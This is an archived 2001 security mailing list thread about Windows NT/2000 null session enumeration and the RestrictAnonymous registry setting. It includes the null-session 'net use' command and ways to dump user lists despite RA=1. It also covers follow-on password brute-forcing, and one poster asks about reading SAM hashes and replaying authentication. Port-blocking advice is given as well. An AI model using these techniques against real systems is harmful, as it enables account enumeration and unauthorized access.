The key is HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA, and the value name is RestrictAnonymous. In NT 4.0, RestrictAnonymous only supports a value data of 0 or 1. Win2k supports 0,1 and a new value data of 2: no access without explicit permissions- meaning that RA=2 will even keep you from doing a [net use \\box\ipc$ "" /user:""] And you are correct- setting RA=1 does break some functionality, and RA=2 breaks even more. However, the entire implementation of RA is funky- it doesn't really keep me from enumerating users via a null session. Though it will make DumpSec fail, and other progs that use most of the Net* API calls, it does not put ACL's on LookupAccountName or LookupAccountSID (that is why user2sid/sid2user still work with ra=1). Additionally, one can make calls to NetUserGetInfo as a null user to return all account information on both NT and Win2k (even extended schema info on 2k). I combined these calls together in UserDump to allow you to effectively dump the entire user-base with a single command line as the null user even with RA=1 set. (Feel free to check it out at http://www.hammerofgod.com/download.htm) So, setting RA=1 doesn't really do much for you, and setting RA=2 normally breaks too much necessary functionality that it is not used- meaning that we can always dump all of your users if we want to. Though the MS security team has been after Dev to change this for a while, it still remains an issue. Word on the street is that they finally got through to them, and that they are going to fix these 'holes' in RA=1... That is really what is necessary, and I will be happy when I see it. Until then, keep your net-facing boxes blocking upd 137,138, and 445 and tcp 139 and 445. --------------------------------- Attonbitus Deus Thorat_private ----- Original Message ----- From: "Keith.Morgan" <Keith.Morganat_private> To: <VULN-DEVat_private> Sent: Sunday, April 15, 2001 11:30 AM Subject: Re: Security Issues ... NT vuln ? > Beware using that key (it restricts null user sessions) in an environment > where NT trust relationships are in place. Turning null sessions off > removes a trusting domain's ability to enumerate users in the trusted > domain. This causes authentication to fail. > > If you have no trust relationships, I highly recommend using the key to > restrict null sessions. > > Keith T. Morgan > Chief of Information Security > Terradon Communications > keith.morganat_private > 304-755-8291 x142 > > > > -----Original Message----- > > From: FatFinger [SMTP:fatfingerat_private] > > Sent: Friday, April 13, 2001 1:10 PM > > To: VULN-DEVat_private > > Subject: Re: Security Issues ... NT vuln ? > > > > -----BEGIN PGP SIGNED MESSAGE----- > > > > Sekure, > > > > Talking about Null Session Attacks, it's not so simple as you pointed > > in your e-mail but it's not also a big deal as some people say. > > > > In fact when you find a PDC or a BDC server (talking about *yuck* > > Windows NT), you can create a null session using standard 'net use' > > commands from DOS prompt. If you're successful, you'll open an IPC$ > > connection. With it, you can use some tools like DumpACL (now > > DumpSEC) to get a list of users even from the Admin group. If I'm not > > wrong you can find this tool at http://www.systemtools.com > > > > No wthat you know the users from that system, you can place several > > different 'net uses' using these usernames with different passwords, > > that you can try to get using brute force attacks, dictionary > > attacks, etc. Note that most of passwords are weak and easy to crack > > (and no password is uncrackeable). > > > > Null Session, in my point of view, can open a system for a > > confidentiality attack. It's more used to 'probe' for info. If you > > want to avoid this thing on your servers, there's a reg key you can > > change. Check the www.microsoft.com web site (security bulletin) to > > get more info about it. Just remember that some tools need to create > > null sessions and, changing this reg key, can lead you to a > > availability problem. > > > > Any comments, folks? > > > > All the best! > > > > FatFinger > > > > > > - ----- Original Message ----- > > From: "sekure" <sekureat_private> > > To: <VULN-DEVat_private> > > Sent: Tuesday, April 10, 2001 8:53 AM > > Subject: Security Issues ... NT vuln ? > > > > > > > Hi Guy, > > > > > > In first, Sorry for my poor english. > > > > > > I'm sending this mail...because i have severals about security. :-) > > > > > > > > > 1) I saw...in my machine that we have a "control of IIS" named > > > Console root > > > but when i call it (local machine) it open me a grapical screen > > > to config. > > > But your name ie CONSOLE root, can i use it in text mode ?? How > > > ?? > > > If it is possible can i use to remote! Do you know if all > > > machines have > > > it file/application ?? The name that i use to execute is: > > > iis.msc :-) > > > > > > 2) I have done tests with netmask... we know that i can't see > > > computers > > > with other netmasks ... example machine A = > > > 200.210.55.240/255.255.255.248 > > > can't see B=200.210.55.241/255.255.255.216 ... correctilly ?? Do > > > you know > > > some mode of see this others machines without change your > > > Netmask ?? > > > A scanner that simule other netmask i don't know!! :-) > > > If you know... please... tell-me! > > > > > > 3) I install NT4.0 and put SP6.0 ... and install IIS ... it put > > > IIS3.0! :) > > > How to upgrade it to 4.0 ?? Only with Option Pack 4.0 ?? Is it > > > possible > > > upgrade to IIS 5.0 ?? How to ?? Where i can get this upgrades, > > > or IIS's ? > > > > > > 4) I already saw in several TXT about security in NT ...speaking > > > that is > > > very dangerous have NETBIOS/SAMBA. We can connect with null > > > session. > > > Ok, suppose that i done it! > > > In my network: "net use \\192.168.0.100\ipc$ "" /user:""" it > > > work very > > > well! But then ?? What can do i with it ?? With it i try access > > > other > > > shares how admin$ and i don't have access. I try access the > > > registry ... > > > and i don't have access again. Why it can be very dangerous ?? > > > I can't unserstand, suppose that a a bit-lamma user have user: > > > "joao" > > > and passwd: "joao" and it is a normal user (no member of admin > > > group). > > > Why can i do with it ?? Can't access the registry, others > > > shares, c$, > > > d$, e$, ...!! For me it is equivalent to null session. I cannot > > > make > > > Anythink!! If you know a good "trick" that i can do with it. > > > please > > > speak me! :-) > > > > > > 5) I install Option Pack 4.0 in my NT+IIS4 to test! :-) > > > It is good, but when i try test(s) of NT-box ...in IIS ... it > > > didn't > > > allow ... !! :-) I tryed to execute ... nt-box ... and execute > > > mkilog, > > > dnsform, cts.idc, *.htx, ... All this files EXIST in my server!! > > > :-) > > > But when i try access (execute) one of this files it is not > > > executed > > > it return me: "A screen to download the file" i can save the > > > file... > > > or execute ...if i execute...it open a cmd screen and execute it > > > and > > > close the window! What is it ?? A protection of Option Pack > > > 4.0?? > > > Permissions of NTFS ?? Permissions in users of IIS ?? How can i > > > change it? > > > How can i crack it ?? > > > > > > 6) Somebody know a program for command (cmd.exe or command.com) > > > that can > > > manipule the registry ?? To see keys, write in keys, ... ! Do > > > you know?? > > > Where i can get it ?? > > > > > > 7) The "nt hash" stay in the registry ?? Who can read it ?? Where > > > is it ?? > > > I found in my NT with regedit and regedt32 ... but i can't > > > found...i saw > > > The keys HKEY_LOCAL_MACHINE\SAM\SAM <- but this key appear is in > > > blank, and > > > your color is different of other color.. your color is gray!! > > > I'm findind > > > as administrator. Exist date(s) in \HKEY_LOCAL_MACHINE\SAM\SAM ? > > > Why i can't > > > see ?? How to do to see ?? > > > > > > 8) I'm thinking...! :-) > > > Suppose that i can spoof the network... then i can see the > > > hashes of > > > authentication!! Can i get this authentication and re-send to > > > server ? > > > It will accept it only how more one packege ?? Or it will accept > > > it how > > > a authorization ?? If it work, i can change my privilegis of > > > normal user > > > to administrator! :-) And better... i don't need lost much time > > > trying > > > crack the password from the hash! :-) > > > > > > 9) The administrator that put NTFS security permissions in CMD.EXE > > > and > > > Command.com and inetpub folder (with good permission only to > > > administrator) > > > withou access to IUSR_MACHINE and EVERYONE. Can we say that your > > > IIS is > > > 100% security or 99.99999999999% ?? What can be doned against it > > > ?? > > > > > > > > > Thkz For all attention and help in the advance. > > > > > > Excuse-me for the accumulated of question(s)... =) > > > > > > Best Regards. > > > > > > [ ]'s > > > > > > > -----BEGIN PGP SIGNATURE----- > > Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com> > > > > iQEVAwUBOtcy+O8uJYTAsvxwAQG9jAf/Rf/4lLMFl9AFs/lZqwiPWqnXr11a8OhR > > y7oTXN1wGMfdJJ9zbTDdR4tCSqY7YOlwj24glPwCa2wFD7B51LfNWBOCQhVvuyzQ > > sGD/oZUoQ2MsAsZkuYZI2amZl3G1R6QwjR3mUbUVvxsuoikBmkPH+8MRNMHZTAsV > > PvcfBJAKME5UNZorihSpVdUV+VZzZluu0rzn1NeuwyeCcPWJCkt6SXC4ggOwryE2 > > ttAHvG1sdKmC48Lz4vD4+wo6J36qX5sCVVk4zrWpAiBcVW6kcTZVd1JPo12d3y68 > > Jg5WGsUQme94V0hA0lVBgav5ZbSCRAvhpBZ6mJ8Rui1IbGY3/LxZbQ== > > =Hau+ > > -----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Mon Apr 16 2001 - 08:23:52 PDT